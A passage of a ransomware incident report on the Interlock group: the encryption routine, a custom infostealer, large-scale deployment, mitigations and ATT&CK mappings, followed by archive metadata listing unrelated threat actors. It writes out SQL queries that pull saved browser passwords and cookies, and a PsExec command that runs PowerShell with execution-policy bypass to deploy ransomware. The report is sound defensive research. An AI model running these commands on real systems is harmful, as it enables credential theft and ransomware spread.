.scr, .sys, .ini, Thumbs.db, .url, .dll, .exe, .ps1\r\nTable 5: Decoded excluded directories and file extensions from within the Interlock ransomware JavaScript file.\r\nThe next function implements the two-step hybrid encryption process applied to the provided files, encrypting each file's unique AES key with the master RSA public key.\r\nFigure 19: Main ‘run’ variable from within the JavaScript ransomware file.\r\nFigure 20: ‘PrivLogger’ function used to instantiate an AES encryptor using the hardcoded public 
key.\r\nThe Log.run() method is the main malware method. First it generates a symmetric Logger (AES), then uses the asymmetric privLogger to encrypt the key, appends it, and then encrypts the file. The privLogger code confirms its use of RSA in encrypt-only mode with the hardcoded key.\r\nWithin the Log class used to perform the encryption there is intermittent (partial) encryption logic that first encrypts a block of the file and then skips a block to speed up the process on large files.\r\nFigure 21: Snippet of the ‘cryptBlocksByAES’ function that performs encryption of the file referenced by the ‘hendle’ file handle provided as input.\r\nThe while loop shows the pattern. It writes an encrypted block (hedle.write) and then immediately jumps the file pointer forward (hedle.seek), leaving a large chunk of the original file untouched but inaccessible. The skip amount (tsk) also grows, making the process faster on very large files.\r\nInitial Ransomware Deployment\r\nThe initial ransomware deployment was performed on key file and core application servers via the adversary’s GUI access. In these initial cases, the adversary first dropped the ransomware executable and a legitimate copy of the javaw.exe application into the user's AppData roaming directory, under directories masquerading as legitimate applications including ‘FortiClient’, ‘VMware’, and ‘Welcome’.\r\nFollowing this initial ransomware deployment and testing, the adversary employed a custom infostealer malware called ‘move.dll’.\r\nCustom Infostealer Malware Analysis - ‘move.dll’\r\nWhen move.dll executes, it overwrites its own in-memory code with a separate DLL, like the other Interlock malware observed in this intrusion. The following analysis relates to the dynamically extracted payload DLL, which we refer to as the custom infostealer.\r\nThe malware is designed to remotely collect sensitive data from network-connected endpoints. The ‘-h’ parameter is used to pass the host/IP of the remote device:\r\nrundll32.exe move.dll start -k key.der -h \u003chostname/IP of target endpoint\u003e\r\nThe sensitive data is collected from several popular web browsers, as listed in Table 6 below (index, browser, related path).\r\n-1 Firefox \\\\\u003cremote-pc\u003e\\\u003c%AppData%\u003e\\Mozilla\\Firefox\\Profiles\r\n0 Chromium \\\\\u003cremote-pc\u003e\\\u003c%LocalAppData%\u003e\\Chromium\\User Data\r\n1 Chrome \\\\\u003cremote-pc\u003e\\\u003c%LocalAppData%\u003e\\Chrome\\User Data\r\n2 Edge \\\\\u003cremote-pc\u003e\\\u003c%LocalAppData%\u003e\\Microsoft\\Edge\\User Data\r\n3 Opera \\\\\u003cremote-pc\u003e\\\u003c%AppData%\u003e\\Opera Software\\Opera Stable\r\n4 Opera-GX \\\\\u003cremote-pc\u003e\\\u003c%AppData%\u003e\\Opera Software\\Opera GX Stable\r\n5 Brave \\\\\u003cremote-pc\u003e\\\u003c%LocalAppData%\u003e\\BraveSoftware\\Brave-Browser\\User Data\r\nTable 6: Browsers targeted by the custom infostealer.\r\nFigure 22 below shows the malware preparing to copy the Chrome credential file named ‘Login Data’ into a local file named ‘zGi0UUlYs0’. It copies these profile files from the remote system to the local system one by one and then processes them. The malware retrieves the remote \u003cusername\u003e by enumerating the subfolders within ‘\\\\\u003cIP of target endpoint\u003e\\C$\\Users’. 
It then copies the target profile data files from the remote device to a locally created file with a random name in the %TEMP% directory. These profile files, which are in SQLite format, contain sensitive browser data.\r\nFigure 22: Custom infostealer code associated with copying collected files from the remote target system.\r\nOnce copied, each file is processed to extract the sensitive data using several SQLite-related APIs and the following SQL commands.\r\nSELECT item1, item2 FROM metadata WHERE id = 'password';\r\nSELECT a11 FROM nssPrivate;\r\nSELECT url, title, last_visit_date FROM moz_places ORDER BY last_visit_date DESC;\r\nSELECT p.url, b.title FROM moz_bookmarks b JOIN moz_places p ON b.fk = p.id;\r\nSELECT host || path, name, value, expiry FROM moz_cookies;\r\nSELECT origin_url, username_value, password_value FROM logins WHERE password_value != ''\r\nSELECT host_key || path, name, encrypted_value, expires_utc FROM cookies;\r\nSELECT url, title, last_visit_time FROM urls ORDER BY last_visit_time DESC;\r\nFigure 23: SQL commands used by the custom infostealer.\r\nThe data retrieved through these queries includes saved credentials, browser history, cookies, and bookmarks, depending on the retrieved artifacts and the data available on the target endpoint. Once the malware has collected this data from a remote endpoint, it saves it to a local CSV file. The file name follows the format ‘\u003cIP of target endpoint\u003e.\u003cusername\u003e.csv’.\r\nWithin the generated CSV, the collected data is split by web browser name and categorized by data type. Figure 25 below shows the data collected from Firefox on a test machine, where ‘cr’ denotes credentials, ‘co’ cookies, ‘hi’ browser history and ‘bo’ saved bookmarks.\r\nFigure 25: Display of collected sensitive data from a sample Firefox browser profile targeted with this custom infostealer.\r\nLarge Scale Ransomware Deployment\r\nFortiGuard IR assesses that the adversary executed this malware to validate the credentials they would then use for large-scale deployment of their ransomware across the remaining Windows domain. This deployment was achieved through the execution of a batch script, ‘W_0.bat’, run through existing ScreenConnect access from a compromised user workstation. This batch script contained a series of hardcoded PsExec commands that used compromised valid domain administrator credentials to execute another version of the 1.ps1 PowerShell script hosted on a share named ‘out’ on the victim’s primary domain controller. An example of one of these commands is shown below in Figure 26.\r\nstart PsExec.exe -d \u003c target_endpoint \u003e -u \"\u003c domain_admin \u003e\" -p \"\u003c domain_admin_password \u003e\" -accepteula -s cmd /c \"powershell.exe -ExecutionPolicy Bypass -file \\\\\u003c victim_domain_controller \u003e\\out\\1.ps1\"\r\nFigure 26: Example PsExec command within the W_0.bat script used to deploy ransomware across the victim environment.\r\nThe PowerShell script executed another version of the ransomware Java file (update.jar) that was also hosted in the ‘out’ share on the victim’s primary domain controller.\r\nFollowing this larger-scale ransomware deployment, the adversary deployed a script that created approximately 5000 new domain user accounts. The names of the accounts aligned with the victim’s naming convention but were randomized. 
Once these accounts were created, the adversary used various PowerShell commands to validate that the accounts had been successfully created. The purpose of this activity was not determined, given that the adversaries had already completed the actions needed to meet their objectives.\r\nConclusion\r\nThis intrusion highlights how the Interlock ransomware group operators continue to adapt their tooling to increase functionality, take advantage of new vulnerabilities, and pivot their TTPs to subvert defender controls. Despite this flexibility in the TTPs they can employ, the continued use of infrastructure already disclosed in open-source threat reporting highlights the importance of:\r\nThreat hunting to identify intrusions before business impact is realized.\r\nIntegrating threat intelligence related to threats in an organization’s threat profile into existing tooling to identify ongoing compromises.\r\nIn this case, there were known indicators within the victim environment that had been disclosed for over four months that could have allowed the organization to identify the initial compromise and remove adversary access before there was an impact on the business. Although organizations are exposed to and must process a significant volume of threat reporting, a threat-centric approach to filtering threat intelligence for the threats, and associated indicators, relevant to an organization is essential in the current threat landscape, especially in the context of financially motivated threat groups.\r\nRecommendations\r\nDespite some notable deviations in this intrusion flow compared to intrusions associated with the more common Ransomware-as-a-Service (RaaS) affiliates, the practical recommendations for mitigating or detecting intrusions continue to align with best practices. The following three recommendations do not require significant resource investment to implement and offer extremely high ROI in the context of the wider ransomware threat.\r\n1. Block the execution of known remote access software explicitly where it is not required to meet standard business needs. Where remote access software is required, scope exclusions to allow legitimate use. As with any type of block, create a detection rule to identify any attempted use of remote access software and monitor it as a high priority. This functionality can be implemented through any suitable EDR [1] solution and should be considered essential basic EDR functionality. It may also be implemented through a suitable NGFW [2].\r\nIntrusion Impact: Forces adversaries to operate using less functional, more overt accesses to slow down the intrusion, reduce its efficacy, increase the likelihood of detectable behavior by the adversary and their tooling, and increase the effective defender response window.\r\n2. Block workstation-to-workstation SMB and RDP connections. There is very limited need for workstation-to-workstation SMB or RDP, and organizations that have business or administrative processes requiring this behavior should develop alternative solutions that align with modern administrative best practices. These blocks can be established using the Windows firewall to block inbound SMB and RDP connections on any endpoints that are not domain controllers, SMB file servers, or hosting SMB shares for core business needs. High-priority alerts should be built around workstation-to-workstation SMB and RDP connection attempts. There are very limited false positives associated with this activity.\r\nIntrusion Impact: Blocking the common pathways used for large-scale ransomware deployment and lateral movement increases the time to impact, minimizes the breadth of impact, creates detection opportunities, and increases the effective defender response window.\r\n3. Block outbound PowerShell network connections. There is very limited need for standard users within a corporate network to perform web requests using PowerShell. However, this technique was employed as part of the initial loader that started this campaign and is a common part of other ClickFix [3] and FileFix [4] infections. Blocking all outbound connections associated with PowerShell and PowerShell_ISE and implementing high-priority alerts for this behavior is effective at mitigating these prevalent initial access techniques. Like the previous recommendation, this change can be easily implemented at a basic level using the Windows firewall.\r\nIntrusion Impact: Denies the adversary the ability to use basic PowerShell download cradles to establish an initial foothold in a network, preventing initial access and providing notification of a current campaign that may be targeting the organization so defenders can identify other potential victims.\r\nMITRE ATT\u0026CK Mapping \u0026 Observables\r\nTA0001: Initial Access\r\nT1204.004 User Execution: Malicious Copy and Paste\r\nObserved Activity: Indicators from this intrusion highlight that initial access was likely through a MintLoader campaign based around ClickFix.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiAnalyzer, FortiGuard Threat Intelligence\r\nOrganizations should leverage EDR technologies to identify and block PowerShell network connections and anomalous cmd and PowerShell usage associated with this technique. 
FortiAnalyzer integrations with FortiGuard threat intelligence offer some protection against large-scale campaigns, but adversaries can quickly change infrastructure, which reduces the efficacy of this approach in isolation.\r\nTA0002: Execution\r\nT1059.001 Command and Scripting Interpreter: PowerShell\r\nObserved Activity: The adversary used PowerShell for the initial download cradle for the NodeSnakeRAT payload and then PowerShell scripts to achieve large-scale ransomware deployment. The adversary also used PowerShell and PowerShell ISE through GUI access to test their large deployment scripts prior to execution, for system enumeration and to deploy the Hotta Killer malware.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiAnalyzer, FortiGuard Threat Intelligence\r\nOrganizations should leverage EDR technologies to identify and block anomalous PowerShell behaviour. Organizations can also centralize PowerShell logging into a SIEM or SOAR to assist with detecting anomalous indicators within logs.\r\nT1059.007 Command and Scripting Interpreter: JavaScript\r\nObserved Activity: The Interlock ransomware used to encrypt Windows endpoints was implemented as a JavaScript file (update.jar and jar.jar) executed through a legitimate javaw.exe binary dropped in one of the following locations:\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Welcome\\bin\\javaw.exe\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\FortiClient\\java\\bin\\javaw.exe\r\nC:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\VMware\\java\\bin\\javaw.exe\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiAnalyzer, FortiGuard Threat Intelligence\r\nOrganizations should leverage EDR technologies to identify and block anomalous PowerShell behaviour. Organizations can also centralize PowerShell logging into a SIEM or SOAR to assist with detecting anomalous indicators within logs.\r\nTA0003: Persistence\r\nT1078 Valid Accounts\r\nObserved Activity: The adversary in this intrusion relied on the use of valid accounts for large-scale deployment of ransomware later in the intrusion.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiAnalyzer, FortiSIEM, FortiSOAR, FortiGuard Threat Intelligence\r\nOrganizations should ensure user login logs are centralized and analyzed as part of standard SOC operations, looking specifically at administrator account behaviour and logins associated with remote access. SIEM solutions that have UBA capabilities, like FortiSIEM, can allow detection of anomalous administrator account usage, and SOAR capabilities can be used to turn these alerts into containment actions, minimizing the impact of an intrusion.\r\nT1053.005 Scheduled Task/Job: Scheduled Task\r\nObserved Activity: The adversary leveraged scheduled tasks heavily for persistence of their Interlock RAT implants. Scheduled task paths were ‘\\Microsoft\\Windows\\Defrag\\ScheduledDefrags’, ‘\\Microsoft\\Windows\\Chkdsk\\TempDefrag’, ‘\\TimeSyncDrive’, ‘\\TimeSyncroDriver’, ‘\\TimeSync’ and ‘\\TimeSyncro’.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiClient, FortiAnalyzer, FortiSIEM, FortiSOAR, FortiGuard Threat Intelligence\r\nOrganizations should look to centralize logs related to the creation and modification of scheduled tasks in a SIEM and build appropriate detection logic for anomalous behavior, especially where these tasks reference known proxy execution targets [8] or files in anomalous directories. Organizations should also look to leverage EDR capabilities to identify anomalous scheduled task creation and execution.\r\nT1543.003 Create or Modify System Process: Windows Service\r\nObserved Activity: The adversary installed ScreenConnect via an MSI installer which registered itself as a service. This was performed on several user workstations and was used as the primary method for interfacing with the victim environment during the ransomware deployment stage.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiClient, FortiAnalyzer, FortiSIEM, FortiSOAR, FortiGuard Threat Intelligence\r\nOrganizations should leverage EDR tooling or application control software to minimize the installation and execution of remote access tooling, even as a service. The installed ScreenConnect service used dedicated C2 infrastructure previously associated with malicious ScreenConnect usage that would be flagged and blocked by tooling with FortiGuard Threat Intelligence integrations.\r\nTA0005: Defense Evasion\r\nT1070 Indicator Removal\r\nObserved Activity: The adversary removed many of their binaries and staged files after exfiltration.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiAnalyzer, FortiGuard Threat Intelligence\r\nEDR tools such as FortiEDR collect telemetry on malicious and suspicious files as they are created and executed, allowing threat intelligence to be extracted and leveraged without access to the files themselves.\r\nT1620 Reflective Code Loading\r\nObserved Activity: Several components of the Interlock operators' custom malware dynamically load additional payloads on execution. 
This includes the custom infostealer, Interlock RAT payloads and Hotta Killer.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR\r\nEDR tools such as FortiEDR will identify in-memory payloads, which subverts this method of obfuscating functional payloads.\r\nTA0006: Credential Access\r\nT1555 Credentials from Password Stores\r\nObserved Activity: The adversary used a custom infostealer to extract passwords from browser password stores. The adversary also employed the GPPPassword script to dump credentials from a compromised endpoint.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR\r\nOrganizations should look to leverage EDR technologies to identify indicators associated with known infostealer tooling such as GPPPassword. Organizations should also prevent users from caching passwords in browser password stores where those password stores are linked to corporate accounts. This prevents adversaries from using a malware foothold running in a user context to gain domain credentials and escalate access.\r\nTA0007: Discovery\r\nT1083 File and Directory Discovery\r\nObserved Activity: The adversary largely leveraged their GUI access through RDP connections to perform directory traversal and manually examine files and folders of interest.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiSIEM\r\nMonitoring file access patterns through centralized logs may assist in identifying anomalous file access and restricting data leakage.\r\nTA0008: Lateral Movement\r\nT1021.001 Remote Services: Remote Desktop Protocol\r\nObserved Activity: The adversary used RDP for lateral movement through their ScreenConnect sessions. This RDP access was used primarily for moving laterally from user workstations to web servers.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiGate, FortiNDR, FortiAnalyzer, FortiSIEM, FortiSOAR\r\nOrganizations should lock down the use of RDP where there is no business case. Where RDP access is required, and an alternative administrative solution is not feasible, organizations should use jump hosts or procedurally limit normal business use. This normalizes RDP traffic within a network and will allow them to more effectively use centralized logging to identify anomalous use. Even where organizations have disabled RDP services, they should set up detection rules associated with its use.\r\nT1021.002 Remote Services: SMB/Windows Admin Shares\r\nObserved Activity: The adversary used PsExec to perform large-scale deployment of their ransomware.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiNDR, FortiSIEM, FortiSOAR, FortiEDR\r\nTA0009: Collection\r\nT1074 Data Staged\r\nObserved Activity: The adversary staged data in temporary archives (.zip) prior to exfiltration through direct GUI access via ScreenConnect.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiSIEM\r\nMonitoring for anomalous file creation patterns through centralized logs, especially in relation to the creation of files with common archive file extensions such as ‘.zip’, ‘.rar’ and ‘.7z’ on servers, can provide solid detection opportunities. EDR tooling such as FortiEDR can provide some telemetry and custom alerting capability to assist with this.\r\nT1005 Data from Local System\r\nObserved Activity: The adversary collected the majority of the data they exfiltrated from local systems, appearing to prefer to directly connect to servers of interest via RDP rather than remotely access files through alternative methods.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiSIEM, FortiSOAR\r\nMonitoring file access patterns for critical local files through centralized logs may assist in identifying anomalous file access and restricting data leakage.\r\nTA0010: Exfiltration\r\nT1048 Exfiltration Over Alternative Protocol\r\nObserved Activity: The adversary used the AZcopy tool to exfiltrate large volumes of data from the victim file server.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiGate, FortiNDR, FortiAnalyzer, FortiSIEM, FortiSOAR\r\nEDR technologies such as FortiEDR can be configured to prevent software such as AZcopy from being used where there is no business need. Network-based detections for the large block sizes typically associated with large-scale exfiltration can be effective at identifying potential exfiltration.\r\nT1041 Exfiltration Over C2 Channels\r\nObserved Activity: The adversary used their ScreenConnect access and chained RDP access to exfiltrate smaller files and folders from the victim environment.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiAnalyzer, FortiSIEM, FortiSOAR\r\nOrganizations should look to utilize UBA detections to identify anomalous user RDP behavior. Where UBA cannot be employed, organizations should attempt to centralize RDP-related logs and utilize basic detection logic to identify anomalous RDP usage to minimize impact.\r\nTA0040: Impact\r\nT1486 Data Encrypted for Impact\r\nObserved Activity: The adversary initially executed Interlock ransomware via an interactive ScreenConnect session and then deployed it across the Windows environment via a batch script used to access a PowerShell script and execute PsExec. The Windows variant added the ‘.gif’ extension to encrypted files. The adversary also employed a second Interlock ransomware variant to encrypt drives on the victim's Nutanix server; this variant added the ‘.!nt3rlock’ file extension to encrypted drives.\r\nMitigation\r\nFortinet Security Fabric Controls - FortiEDR, FortiClient\r\nEDR tools such as FortiEDR effectively block this encryption behavior, as observed earlier in the intrusion. Organizations should ensure they respond to EDR tooling alerts to minimize the impact of intrusions.\r\nFortiGuard Protections\r\nInterlock ransomware scripts and binaries are detected through the following AV signatures:\r\nJava/Interlock.A1EF!tr\r\nJS/Interlock.D870!tr\r\nW32/Kryptik.HXUY!tr.ransom\r\nLinux/Filecoder_InterLock.A!tr\r\nW64/GenKryptik.HCFC!tr\r\nW64/GenKryptik.HHER!tr\r\nW64/Filecoder_Rhysida.D!tr (Note that the reference to Rhysida is due to indicator crossover in earlier Interlock samples.)\r\nFortiEDR’s behavioral detections effectively mitigated the early post-exploitation TTPs deployed in this attack, including lateral movement attempts, credential access attempts, persistence through scheduled tasks, initial ransomware deployment, and privilege escalation attempts. 
\r\nEngaging the FortiGuard Incident Response Team\r\nFortiGuard Security Advisory Services offer a range of vendor-agnostic consulting services to assess an organization’s current security posture, help prepare an organization to respond to an incident, and assist with incident response activities when an incident occurs.\r\nIf you experience a cybersecurity incident and require assistance, reach out to us. Our team will engage as soon as possible with a free scoping call to assist.\r\nIndicators of Compromise (IOCs)\r\nBefore the release of this article, FortiGuard provided the IOCs below and details of this intrusion to relevant law enforcement agencies, coordinating with ongoing operations.\r\nIOCs associated with this intrusion are provided below and are also available here to assist with ingestion into automated tooling:\r\n[1] https://docs.fortinet.com/document/fortiedr/7.2.0/administration-guide/815103\r\n[2] https://community.fortinet.com/t5/FortiGate/Troubleshooting-Tip-Blocking-All-Remote-Access-software/ta-p/360335\r\n[3] https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/\r\n[4] https://www.acronis.com/en/tru/posts/filefix-in-the-wild-new-filefix-campaign-goes-beyond-poc-and-leverages-steganography/\r\nSource: 
https://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nhttps://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks\r\nPage 24 of 24",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/interlock-ransomware-new-techniques-same-old-tricks"
	],
	"report_names": [
		"interlock-ransomware-new-techniques-same-old-tricks"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4390d8ec-605d-493a-81ee-d5ef80c07046",
			"created_at": "2025-05-29T02:00:03.223467Z",
			"updated_at": "2026-04-10T02:00:03.873701Z",
			"deleted_at": null,
			"main_name": "TAG-124",
			"aliases": [
				"LandUpdate808"
			],
			"source_name": "MISPGALAXY:TAG-124",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434260,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4077be8fa0679f7b8ed925e39a78ca41b5b35dbe.pdf",
		"text": "https://archive.orkl.eu/4077be8fa0679f7b8ed925e39a78ca41b5b35dbe.txt",
		"img": "https://archive.orkl.eu/4077be8fa0679f7b8ed925e39a78ca41b5b35dbe.jpg"
	}
}